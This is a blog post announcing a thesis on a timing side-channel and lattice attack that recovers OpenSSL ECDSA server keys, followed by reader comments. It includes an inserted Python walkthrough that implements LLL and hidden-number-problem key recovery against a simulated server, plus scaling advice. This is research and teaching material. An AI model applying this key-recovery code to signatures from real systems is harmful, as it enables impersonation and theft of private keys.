Timing and Lattice Attacks on a Remote ECDSA OpenSSL Server: How Practical Are They Really? posted August 2015
Alright! My master thesis is done. Here's a download link
It's a timing attack on a vulnerable version of OpenSSL, specifically its ECDSA signing over binary curves.
Right before the constant-time scalar multiplication of the nonce by the base point, OpenSSL ran an optimization whose running time depends on the bit length of the scalar. That turns into a remote timing attack that leaks the length of the ephemeral key (the ECDSA nonce) behind each signature an OpenSSL server produces.
In this paper I explain how to set up such an attack, and how to use lattices to recover the server's private key from nothing more than the lengths of the nonces of a batch of signatures collected during ephemeral, ECDSA-signed TLS handshakes: the signatures whose nonces are shortest are the useful ones, since every missing top bit of a nonce is a bit of bias the lattice can exploit.
If this doesn't make sense to you, just read the paper :D
Everything is also on this GitHub repo: you can reproduce my setup for a vulnerable server and an attacker, and the patch and the tools are there. If you end up getting better results than the ones in the paper, well, tell me!
Also here's a demo:
EDIT: it's on the ePrint archive as well now.
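Worked example (added by the editor, not part of the original post, the thesis or the tools in the repo): the whole pipeline in one file. A toy server signs with ECDSA, a simulated timing channel hands the attacker each nonce's bit length, the attacker keeps the signatures with short nonces, builds the hidden-number-problem lattice and runs LLL to pull out the private key. Assumptions, all mine: secp256k1 is used instead of the binary curves the thesis attacks (the lattice step only ever sees r, s, h and the group order, so the curve does not matter for it); the LLL is a textbook exact-rational implementation that is only fast enough for a handful of signatures, so the scenario is exaggerated to four 128-bit nonces plus three full-size decoys; the function names and the seeded-RNG "server" are constructed for the demo.

```python
from fractions import Fraction
import random

# secp256k1 (y^2 = x^3 + 7 over F_P, base point G of prime order N) stands in for OpenSSL's binary curves.
P = 2**256 - 2**32 - 977
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

def ec_add(p1, p2):
    """Affine point addition; None is the point at infinity."""
    if p1 is None or p2 is None:
        return p1 or p2
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P   # doubling (a = 0 on this curve)
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def ec_mul(k, pt):
    """Double-and-add scalar multiplication (the modelled leak lives in the server, not here)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt, k = ec_add(pt, pt), k >> 1
    return acc

def ecdsa_sign(d, h, k):
    """Textbook ECDSA signature (r, s) on hash value h (already reduced mod N) with nonce k."""
    r = ec_mul(k, G)[0] % N
    return r, pow(k, -1, N) * (h + r * d) % N

def lll(basis, delta=Fraction(99, 100)):
    """Textbook LLL in exact rational arithmetic; fine for the tiny lattice used here."""
    B, d = [list(row) for row in basis], len(basis)
    Bs, norms = [None] * d, [None] * d                 # Gram-Schmidt vectors and squared norms
    mu = [[Fraction(0)] * d for _ in range(d)]
    def dot(u, v): return sum(a * b for a, b in zip(u, v))
    def gram_schmidt(start):                           # rows before `start` are unchanged
        for i in range(start, d):
            v = [Fraction(x) for x in B[i]]
            for j in range(i):
                mu[i][j] = dot(B[i], Bs[j]) / norms[j]
                v = [a - mu[i][j] * b for a, b in zip(v, Bs[j])]
            Bs[i], norms[i] = v, dot(v, v)
    gram_schmidt(0)
    k = 1
    while k < d:
        for j in range(k - 1, -1, -1):                 # size-reduce b_k against b_j
            q = round(mu[k][j])
            if q:
                B[k] = [a - q * b for a, b in zip(B[k], B[j])]
                for i in range(j):
                    mu[k][i] -= q * mu[j][i]
                mu[k][j] -= q
        if norms[k] >= (delta - mu[k][k - 1] ** 2) * norms[k - 1]:   # Lovasz condition
            k += 1
        else:
            B[k], B[k - 1] = B[k - 1], B[k]
            gram_schmidt(k - 1)
            k = max(k - 1, 1)
    return B

def recover_key(pub, sigs, hashes, lengths, max_len):
    """Attacker: keep signatures whose leaked nonce length is <= max_len, then solve the hidden
    number problem k_i = u_i + t_i*d (mod N), k_i < 2**max_len, with d eliminated (Howgrave-Graham/Smart)."""
    keep = [i for i, bits in enumerate(lengths) if bits <= max_len]
    t = [pow(sigs[i][1], -1, N) * sigs[i][0] % N for i in keep]  # t_i = r_i / s_i
    u = [pow(sigs[i][1], -1, N) * hashes[i] % N for i in keep]   # u_i = h_i / s_i
    m, K, inv_t0 = len(keep), 1 << max_len, pow(t[0], -1, N)
    a = [ti * inv_t0 % N for ti in t[1:]]                        # k_i = a_i*k_0 + b_i (mod N)
    b = [(ui - ai * u[0]) % N for ai, ui in zip(a, u[1:])]
    basis = [[N if c == r else 0 for c in range(m + 1)] for r in range(m - 1)]
    basis += [a + [1, 0], b + [0, K]]
    # (k_1, ..., k_{m-1}, k_0, K) is a lattice vector with every coordinate below K, so LLL surfaces it
    for row in lll(basis):
        if abs(row[-1]) == K:
            k0 = row[-2] if row[-1] == K else -row[-2]
            cand = (k0 - u[0]) * inv_t0 % N
            if ec_mul(cand, G) == pub:                           # attacker's own check
                return cand
    return None

def demo(seed=1, nonce_bits=128, short=4, decoys=3):
    """Constructed scenario: a seeded 'server' with `short` nonces of only `nonce_bits` bits and `decoys` full-size ones."""
    rng = random.Random(seed)
    d = rng.randrange(1, N)
    pub = ec_mul(d, G)
    nonces = [rng.randrange(1, 1 << nonce_bits) for _ in range(short)]
    nonces += [rng.randrange(1, N) for _ in range(decoys)]
    hashes = [rng.randrange(1, N) for _ in nonces]               # "hashes" already reduced mod N
    sigs = [ecdsa_sign(d, h, k) for h, k in zip(hashes, nonces)]
    lengths = [k.bit_length() for k in nonces]                   # what the timing side channel leaks
    return recover_key(pub, sigs, hashes, lengths, nonce_bits) == d
```

`demo()` returns True once the recovered key matches the server's. The sizing rule this makes concrete: with an l-bit leak per nonce and a 256-bit group order, the target vector has norm about 2^(256-l) while the lattice determinant is N^(m-1) * 2^(256-l), so the target is only the unique shortest vector once m > 256/l plus a margin of a few signatures. At l = 8 that means 32-plus signatures with short nonces, sieved out of a pool 256 times larger, and at that dimension a pure-Python LLL is hopeless; use fpylll or Sage's LLL/BKZ there.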
Comments
cq
How about the latest OpenSSL?
david
It is patched! Look at my paper :P
cq
Thanks. How about the get_small_nonces_data.py? It may be missing. :)
cq
BTW, which paper did you mention in the LLL video about Tsinghua University? Can you give a link? Thanks.
david
I just added it in `tools/`!
I have a bunch of other tools and readmes on how to make the plots, maybe I should upload that.
As for the Tsinghua paper, check my paper here: https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/survey_final.pdf
But I might not talk about it there; if not, I don't know where you can find that other than looking on the IACR ePrint for Boneh and Durfee.
david
Found it: Remarks on the bounds for cryptanalysis of low private key RSA (2008)
cq
Yeap.
How does LLL compare to other methods or algorithms? For example, targeting RSA-150.
Time cost, bla bla...
david
Why would someone test RSA-150? (You mean RSA with a modulus of 150 bits?)
I don't really understand your question; there are some numbers in my paper. It would be interesting to see if BKZ has better results (although when I was testing, it seemed to have the same results for the RSA attack).
cq
I mean https://en.wikipedia.org/wiki/RSA_numbers
david
I don't think LLL and BKZ are very relevant to factorization contests.
The attack applies if the private key is small.
cq
On my local Ubuntu, it always runs with result -trick (1000 | 10000 | 100000). I guess it's not that practical.
Also, it only solved when length=157. And when should trick be 6, and when 7?
I guess maybe I should try an older version, like 0.9.8.